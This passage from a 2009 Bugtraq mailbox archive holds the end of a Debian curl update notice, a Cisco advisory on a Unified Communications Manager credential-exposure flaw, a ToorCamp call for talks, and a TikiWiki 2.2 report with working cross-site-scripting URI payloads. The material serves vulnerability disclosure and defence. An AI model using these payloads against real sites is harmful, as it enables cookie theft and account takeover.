  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_s390.deb
    Size/MD5 checksum:   223330 8c5ca7bc3655a68e2fc33d11ecc06865
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_s390.deb
    Size/MD5 checksum:   209294 e28839caee56080274e61541e035af52
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_s390.deb
    Size/MD5 checksum:  1190688 bd391c517d8ec4b5179f753ef73825a9
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_s390.deb
    Size/MD5 checksum:   931312 dc473f1db5201689c7cb15f41929f780
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_s390.deb
    Size/MD5 checksum:   239904 5f08a1a17220525e249e6dec32a21bfb
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_s390.deb
    Size/MD5 checksum:   912728 368e5d51de6826fce49b35e728a52dda

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_sparc.deb
    Size/MD5 checksum:   207660 84f75b95a33d19a1027b281c136f38ca
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_sparc.deb
    Size/MD5 checksum:   208576 4ac3ac2bb012ba68a1872620cc90e3a3
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_sparc.deb
    Size/MD5 checksum:  1134708 3403c94f0c0c32c1e964364337132456
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_sparc.deb
    Size/MD5 checksum:   222562 990364878bde2699a2af470013f90fce
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_sparc.deb
    Size/MD5 checksum:   902436 8f221c8abaab29401bd0434b9add83c8
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_sparc.deb
    Size/MD5 checksum:   918590 2d0b3f1dc2882cc2446ed708c2f2b55e


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm36v4ACgkQHYflSXNkfP/PaQCfe6xmnRhMoAmhLaEsVrOEwCD2
OKIAoKxDcy9wTjQb4jLMoZ1tAqSuS9jr
=eSVR
-----END PGP SIGNATURE-----

From - Wed Mar 11 18:31:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068ff
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39715-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B6D0DECF69
for <lists@securityspace.com>; Wed, 11 Mar 2009 18:22:41 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 53CAC143732; Wed, 11 Mar 2009 14:35:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15050 invoked from network); 11 Mar 2009 15:09:48 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco Unified Communications Manager IP Phone Personal Address Book Synchronizer Privilege Escalation Vulnerability
Date: Wednesday, 11 March 2009 10:40:00 -0500 
Message-id: <200903111040.cucmpab@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Unified Communications Manager IP
Phone Personal Address Book Synchronizer Privilege Escalation
Vulnerability

Advisory ID: cisco-sa-20090311-cucmpab

Revision 1.0

For Public Release 2009 March 11 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
======
Cisco Unified Communications Manager, formerly CallManager, contains
a privilege escalation vulnerability in the IP Phone Personal Address
Book (PAB) Synchronizer feature that may allow an attacker to gain
complete administrative access to a vulnerable Cisco Unified
Communications Manager system. If Cisco Unified Communications
Manager is integrated with an external directory service, it may be
possible for an attacker to leverage the privilege escalation
vulnerability to gain access to additional systems configured to use
the directory service for authentication.

Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml

Affected Products
================
Vulnerable Products
+------------------

The following products are vulnerable:

  * Cisco Unified CallManager 4.1 versions
  * Cisco Unified Communications Manager 4.2 versions prior to 4.2(3)SR4b
  * Cisco Unified Communications Manager 4.3 versions prior to 4.3(2)SR1b
  * Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
  * Cisco Unified Communications Manager 6.x versions prior to 6.1(3)
  * Cisco Unified Communications Manager 7.0 versions prior to 7.0(2)

Administrators of systems that are running Cisco Unified
Communications Manager software version 4.x can determine the
software version by navigating to Help > About Cisco Unified
CallManager and selecting the Details button via the Cisco Unified
Communications Manager administration interface.

Administrators of systems that are running Cisco Unified
Communications Manager software versions 5.x, 6.x, and 7.x can
determine the software version by viewing the main page of the Cisco
Unified Communications Manager administration interface. The software
version can also be determined by running the command show version
active via the command line interface (CLI).

Products Confirmed Not Vulnerable
+--------------------------------

Cisco Unified Communications Manager Express is not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.

Details
======
The Cisco IP Phone Personal Address Book (PAB) Synchronizer feature
of Cisco Unified Communications Manager allows users to keep their
Cisco Unified Communications Manager address book synchronized with
their Microsoft Windows address book. The IP Phone PAB Synchronizer
feature contains a privilege escalation vulnerability that may allow
an attacker to obtain complete administrative access to a vulnerable
Cisco Unified Communications Manager system. After an IP Phone PAB
Synchronizer client successfully authenticates to a Cisco Unified
Communications Manager device over a HTTPS connection, the Cisco
Unified Communications Manager returns credentials for a user account
that is used to manage the Cisco Unified Communications Manager
directory service. If an attacker is able to intercept the
credentials, they can perform unauthorized modifications to the Cisco
Unified Communications Manager configuration and extend their
privileges. The IP Phone PAB Synchronizer client has been redesigned
to allow address book synchronization without requiring the directory
service credentials. This vulnerability does not allow an attacker to
gain access to the underlying platform operating system of any Cisco
Unified Communications Manager system.

Cisco Unified Communications Manager 4.x
+---------------------------------------

Cisco Unified Communications Manager software version 4.x by default
stores user information using an internal Lightweight Directory
Access Protocol (LDAP) server called DC Directory. After an IP Phone
PAB Synchronizer client successfully authenticates, the Cisco Unified
Communications Manager returns credentials for the DC Directory user
that will be used by the client to synchronize a user's address book.
Depending on how a Cisco Unified Communications Manager is
configured, an attacker may obtain different privilege levels using
the intercepted credentials.

By default, Cisco Unified Communications Manager software version 4.x
administrator accounts are created as part of an underlying Microsoft
Windows operating system. Cisco Unified Communications Manager is
commonly deployed using the Multi-Level Administration (MLA) feature
to ease the integration of Cisco Unified Communications Manager into
enterprise environments. If MLA is enabled, Cisco Unified
Communications Manager stores administrator accounts in the Cisco
Unified Communications Manager DC Directory service. If an attacker
obtains the DC Directory credentials and MLA is enabled, the attacker
can add an existing account to the Cisco Unified Communications
Manager super-user group. The attacker can then access the Cisco
Unified Communications Manager management interface with complete
administrative access. If MLA is not enabled, the attacker cannot
escalate their privileges; however, they can modify any user settings
in the directory.

The Cisco Unified Communications Manager 4.x IP Phone PAB
Synchronizer client uses an unencrypted LDAP connection to perform
address book synchronization. The DC Directory credentials are passed
in the clear over the network and are vulnerable to being sniffed by
an attacker. If using the DC Directory internal LDAP server, the IP
Phone PAB Synchronizer client communicates to Cisco Unified
Communications Manager on TCP ports 8404 and 8405.

Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------

Cisco Unified Communications Manager software versions 5.x, 6.x, and
7.x store user information as a part of the internal Cisco Unified
Communications Manager configuration database. The IP Phone PAB
Synchronizer client uses the AXL application programming interface
(API) to perform address book synchronization. After a client
successfully authenticates, the Cisco Unified Communications Manager
returns credentials for a database user account named TabSyncSysUser
that will be used by the client to synchronize an user's address
book. The TabSyncSysUser account has full read and write privileges
to the Cisco Unified Communications Manager configuration database.
Using the TabSyncSysUser credentials via the AXL API, an attacker can
modify any parameter in the database including creating new
administrator accounts.

Directory Service Integration
+----------------------------

Cisco Unified Communications Manager software versions 4.x, 5.x, 6.x,
and 7.x can be integrated with Microsoft Active Directory and several
non-Microsoft LDAP servers to perform user authentication. In order
to function properly, the integration process requires that
appropriate user credentials for the directory service are provided
to Cisco Unified Communications Manager. If an attacker intercepts or
sniffs the directory service credentials returned by a Cisco Unified
Communications Manager responding to an IP Phone PAB Synchronizer
client, the attacker may be able to leverage the credentials to gain
access to additional systems configured to use the directory service
for authentication.

Administrators should ensure that any directory service credentials
used for the Cisco Unified Communications Manager integration process
are configured to follow the principle of least privilege. The
credentials should be configured with only the privileges necessary
to access the directory service data needed for the integration
process to function properly. The use of overly privileged
administrator accounts is discouraged. Please see the Workarounds
section for more information on performing the integration of Cisco
Unified Communications Manager with AD using the least privilege
concept.

This vulnerability is documented in Cisco Bug IDs CSCso76587 and
CSCso78528 and has been assigned Common Vulnerabilities and Exposures
(CVE) identifier CVE-2009-0632.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

CSCso76587 - Directory Manager password sent in clear from client

CVSS Base Score - 9

Access Vector           - Network
Access Complexity       - Low
Authentication          - Single
Confidentiality Impact  - Complete
Integrity Impact        - Complete
Availability Impact     - Complete

CVSS Temporal Score - 7.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCso78528 - TabSyncSysUser (axl user) password sent in clear from client

CVSS Base Score - 9

Access Vector           - Network
Access Complexity       - Low
Authentication          - Single
Confidentiality Impact  - Complete
Integrity Impact        - Complete
Availability Impact     - Complete

CVSS Temporal Score - 7.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

Impact
=====
Successful exploitation of this vulnerability may allow an attacker
to intercept user credentials that allow the attacker to escalate
their privilege level and obtain complete administrative access to a
vulnerable Cisco Unified Communications Manager system. If integrated
with an external directory service, the intercepted user credentials
may allow an attacker to gain access to additional systems configured
to use the directory service for authentication.

Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Cisco Unified Communications Manager software version 4.2(3)SR4b
contains the fix for this vulnerability. Administrators of Cisco
Unified CallManager software version 4.1 systems are encouraged to
upgrade to Cisco Unified Communications Manager software version 4.2
(3)SR4b in order to obtain fixed software. Version 4.2(3)SR4b can be
downloaded at the following link:

http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid(0264388&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20CallManager%20Version%204.2&isPlatform=N&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 4.3(2)SR1b
contains the fix for this vulnerability. Version 4.3(2)SR1b can be
downloaded at the following link:

http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid(0771554&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%204.3&isPlatform=N&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 5.1(3e)
contains the fix for this vulnerability. Version 5.1(3e) can be
downloaded at the following link:

http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=null&isPlatform=Y&mdfid(0735907&sftType=Unified%20Communications%20Manager%20Updates&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20Communications%20Manager%20Version%205.1&mdfLevel=Software%20Version/Option&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 6.1(3) contains
the fix for this vulnerability. Version 6.1(3) can be downloaded at
the following link:

http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid(1023410&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%206.1&isPlatform=N&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 7.0(2) contains
the fix for this vulnerability. Version 7.0(2) can be downloaded at
the following link:

http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=&isPlatform=Y&mdfid(1941895&sftType=Unified+Communications+Manager+Updates&treeName=Voice+and+Unified+Communications&modelName=Cisco+Unified+Communications+Manager+Version+7.0&mdfLevel=Software%20Version/Option&treeMdfId'8875240&modifmdfid=null&imname=&hybrid=Y&imst=N

Workarounds
==========
It is possible to mitigate against this vulnerability using the
following workarounds.

Cisco Unified Communications Manager 4.x
+---------------------------------------

It is possible to mitigate this vulnerability by moving the ASP
script that IP Phone Personal Address Book (PAB) Scynchronizer
clients interact with to a directory location that is not accessible
to the Cisco Unified Communications Manager web server. The system
drive where the ASP script resides depends on how Cisco Unified
Communications Manager was installed. Employing this workaround will
prevent address book synchronization; however, the PAB application
will continue to function. The ASP script can be moved using the
following command:

    C:\> move c:\CiscoWebs\User\LDAPDetails.asp c:\temp

It is also possible to mitigate this vulnerability by implementing
filtering on screening devices or using the Windows firewall.
Administrators are advised to permit access to TCP ports 8404 and
8405 only from trusted networks.

Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------

It is possible to mitigate this vulnerability by restricting the
permissions of the TabSyncSysUser database user account. In the Cisco
Unified Communications Manager Administration interface, navigate to 
User Management > Application User and search for the TabSyncSysUser
account. Remove all groups from the account and change the password.
Employing this workaround will prevent address book synchronization;
however, the PAB application will continue to function.

Active Directory Integration
+---------------------------

To improve the security of Cisco Unified Communications Manager
integration with Active Directory (AD), Cisco has produced a
whitepaper that provides a detailed explanation of how to perform
Cisco Unified Communications Manager integration with AD using the
least-privileged principle. The whitepaper can be downloaded here:

http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_tech_note09186a0080a83435.shtml

Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20090311-cucmpab.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center sw-usingswc.shtml.

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact
information, including localized telephone numbers, and instructions
and e-mail addresses for use in various languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

The vulnerability in Cisco Unified Communications Manager 4.x
software versions was reported to Cisco by Olivier Grosjeanne of
Dimension Data France. The vulnerability in Cisco Unified
Communications Manager 5.x, 6.x and 7.x software versions was
reported by Oliver Dewdney of LBI.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |               | Initial    |
| 1.0      | 2009-March-11 | public     |
|          |               | release.   |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:

http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

iD8DBQFJt9DF86n/Gc8U/uARAtjqAJ9eE9ETbc4lyUJV8GrCEmiaJeS1NACdExbB
dLmiSiaPCdGHpVKTKvZj78k�h7
-----END PGP SIGNATURE-----

From - Thu Mar 12 11:21:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006911
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39718-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 11102ED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:17:21 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1673E236FAE; Thu, 12 Mar 2009 08:11:00 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11498 invoked from network); 11 Mar 2009 18:54:35 -0000
Date: Wed, 11 Mar 2009 12:54:34 -0600
Message-Id: <200903111854.n2BIsYrt025782@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: h1kari@toorcon.org
To: bugtraq@securityfocus.com
Subject: TOORCAMP 2009 CALL FOR PARTICIPATION
Status:   

TOORCAMP 2009 CALL FOR PARTICIPATION


INTRODUCTION

ToorCamp is the United State's first ever full-scale hacker camp. Modelled after the camps in Holland and Germany, ToorCamp will focus on all of the technology topics that ToorCon has become famous for but will expand out into other areas of society. ToorCamp will offer 2 days of talks on many different topics -- Security, Internet, Emerging Technologies, Hardware Hacking, and Privacy are just some of the areas we will be covering. ToorCamp will also feature 2 days of hands-on workshops on a multitude of different skills that you may have never found yourself interested in learning about before. Blacksmithing, Lock Picking, Orienteering, Logic Design, Archery -- These are just a few of the topics you can expect.

ToorCamp is run by the same group that runs ToorCon and will also be heavily supported by many other hacker conferences in the US. ToorCamp will be organized as a bunch of different campsites which will be fully run by autonomous groups. We will provide the power and internet -- you provide the rest. We're heavily encouraging groups to build structures, setup art projects, throw parties, and generally do things that will show to the world that US hackers can throw a kickass hacker camp too!

Oh, and did we mention it'll be at a Titan-1 Missile Silo? We've managed to find one of the best locations in the northwest to throw this event. We've partnered with a group of people who are currently retrofitting the Silo into an ultra-secure datacenter so internet connectivity won't be a problem. ToorCamp will be situated in central Washington roughly 3 hours driving distance from Seattle and within 15 minutes drive of a private international airport. Don't miss this once in a lifetime opportunity to make history with us and help launch the first public US hacker camp!


LOGISTICS

ToorCamp will provide many of the basic hacker camp comforts such as:

- Power
- Internet

And some of the less-essential comforts such as:

- Food
- Water
- Toilets

Some optional accessories that will be available for rental are:

- Tents
- Camping matresses
- Sleeping bags


CAMPSITE ORGANIZER SUBMISSION INFORMATION

We're looking for campsite organizers that can help out by taking charge of parts of the camp. Campsites that have at least 10 occupants will be given a 10% discount on admission for everyone registered for the campsite. Part of being a campsite organizer is helping fellow campers get shelter, community food, throwing parties, and possibly organizing group transportation out to the camp. The 10% discount refund can be given back to the campsite organizer to help fund these types of things, can be refunded to all of the campsite inhabitants, or donated to the ToorCon Foundation. To sign up for being a campsite organizer, please fill out our signup webform at:

[http://toorcamp.org/campsite-signup]


PAPER SUBMISSION INFORMATION

For ToorCamp we will be having 50-minute talks on Thursday, 20-minute talks on Friday, and then hands-on workshops throughout the weekend. To submit a talk for the conference, please fill out the information below and email to cfp@toorcamp.org:

0. Name
1. Email Address
2. Mobile Phone Number
3. Brief Bio
4. Title of the Talk
5. Brief Abstract
6. Any supporting materials, links, outlines, etc
7. What talk format are you submitting for:
� � 0. 20-minute talk
� � 1. 50-minute talk
� � 2. 1-day workshop
� � 3. 2-day workshop


DISCLAIMERS

ToorCamp has full permission to record and republish any material that is presented at the conference.


REASONS TO SUBMIT A TALK

- The fame and prestige of presenting at the first public US hacker camp!
- Invitations to all of the parties and special events
- Sorry, we are not able to cover air travel expenses but we will try to provide campsite accommodations if requested


SPONSORSHIP

ToorCamp has many levels of sponsorship for companies that want to help make history. We're currently looking for sponsors for the conference and the Missile Silo owners are also looking for sponsors and potential partners to help them build out their ultra-secure datacenter. For more information on sponsorship opportunities, please email geo@toorcon.org.


REGISTRATION

Pre-registration is currently open at $150. It will be slowly increasing the price every month until it's $350 at the gate, so don't miss out on this amazing price for 4 full days of camping, talks, workshops, and non-stop entertainment at one of the best locations in the northwest. Once you're registered you'll have access to our planning, talks, and rideshare discussion forums. To pre-register we've setup registration on our website linked below.

[http://toorcamp.org/Registration]


LOCATION INFO

ToorCamp 2009
Titan-1 Missile Silo
July 2nd-5th, 2009
Moses Lake, WA

[http://www.toorcamp.org]


IMPORTANT DATES

March 10th, 2009 - Call for Participation Opens

April 3rd, 2009 - First Round of Registration Closes

May 1st, 2009 - Second Round of Registration Closes
May 1st, 2009 - First round of selection announced
May 15nd, 2009 - Second round of selection announced
May 29th, 2009 - Call for Papers closes

June 5th, 2009 - Third Round of Registration Closes
June 5th, 2009 - Speaker & sponsor selection finalized

July 1st, 2009 - Move into ToorCamp
July 2nd, 2009 - ToorCamp 50-minute Talks
July 3rd, 2009 - ToorCamp 20-minute Talks
July 4th, 2009 - ToorCamp Workshops
July 5th, 2009 - ToorCamp Workshops
July 6th, 2009 - Move out of ToorCamp

From - Thu Mar 12 11:31:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006913
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39726-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 15C63ED5EC
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:26:29 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9F095143BD7; Thu, 12 Mar 2009 08:15:30 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14983 invoked from network); 12 Mar 2009 08:54:42 -0000
Date: Thu, 12 Mar 2009 02:54:41 -0600
Message-Id: <200903120854.n2C8sfs8027843@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: iliz-z@yandex.rui
To: bugtraq@securityfocus.com
Subject: TikiWiki 2.2 XSS Vulnerability in URI
Status:   

Application: TikiWiki
Version: 2.2 (latest)
Website: www.tikiwiki.org

Bug: Active XSS in URI

Exploitation: Remote
Date: 12 Mar 2009

Discovered by: iliz
Author: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru

Bug Description:
TikiWiki version 2.2 and later uses URI in html response body and fails to sanitize it. Is therefore prune to Active XSS attack.

PROOF OF CONCEPT:
/tiki-galleries.php/>"><Script>alert(1)</scRipt>
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>
/tiki-listpages.php/>"><Script>alert(3)</scRipt>
/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>

The javascript code will be executed in the context of the victim's
browser, this can be exploited to steal cookies and escalate
privileges to administrator.

Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, InternetExplorer 7, Opera 9.65



From - Thu Mar 12 11:41:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006914
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39719-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8DAC1ED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:33:52 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D9EBE236FCE; Thu, 12 Mar 2009 08:11:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
